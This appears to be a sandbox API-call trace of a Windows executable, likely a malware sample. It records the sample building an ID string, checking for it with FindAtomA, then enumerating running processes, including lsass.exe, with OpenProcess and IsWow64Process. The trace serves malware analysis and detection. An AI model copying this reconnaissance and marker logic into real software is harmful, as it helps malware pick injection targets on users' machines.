	[0072.830] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.830] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.831] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.831] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.832] GetLastError () returned 0x5
	[0072.833] GetLastError () returned 0x5
	[0072.833] GetLastError () returned 0x5
	[0072.833] GetLastError () returned 0x5
	[0072.833] GetLastError () returned 0x5
	[0072.833] GetLastError () returned 0x5
	[0072.833] GetLastError () returned 0x5
	[0072.833] GetLastError () returned 0x5
	[0072.833] GetLastError () returned 0x5
	[0072.833] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.833] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.833] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.833] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.833] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.833] CloseHandle (hObject=0x224) returned 1
	[0072.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.833] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.833] CloseHandle (hObject=0x224) returned 1
	[0072.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e888, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.834] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.834] CloseHandle (hObject=0x224) returned 1
	[0072.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16db8) returned 0xc0000004
	[0072.882] VirtualAlloc (lpAddress=0x0, dwSize=0x16eb8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16eb8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0072.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.887] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.887] CloseHandle (hObject=0x224) returned 1
	[0072.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728838, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.888] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.888] CloseHandle (hObject=0x224) returned 1
	[0072.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728838, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.888] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.888] CloseHandle (hObject=0x224) returned 1
	[0072.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.888] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.888] CloseHandle (hObject=0x224) returned 1
	[0072.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.888] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.889] CloseHandle (hObject=0x224) returned 1
	[0072.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.889] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.889] CloseHandle (hObject=0x224) returned 1
	[0072.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.889] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.889] CloseHandle (hObject=0x224) returned 1
	[0072.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.889] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.889] CloseHandle (hObject=0x224) returned 1
	[0072.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.890] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.890] CloseHandle (hObject=0x224) returned 1
	[0072.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.890] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.890] CloseHandle (hObject=0x224) returned 1
	[0072.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.890] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.890] CloseHandle (hObject=0x224) returned 1
	[0072.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.890] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.890] CloseHandle (hObject=0x224) returned 1
	[0072.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.890] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.891] CloseHandle (hObject=0x224) returned 1
	[0072.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc30, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.891] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.891] CloseHandle (hObject=0x224) returned 1
	[0072.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728a58, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.891] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.891] CloseHandle (hObject=0x224) returned 1
	[0072.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e888, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.891] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.891] CloseHandle (hObject=0x224) returned 1
	[0072.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7288f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.891] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.891] CloseHandle (hObject=0x224) returned 1
	[0072.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.891] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.891] CloseHandle (hObject=0x224) returned 1
	[0072.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.892] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.892] CloseHandle (hObject=0x224) returned 1
	[0072.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728a58, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
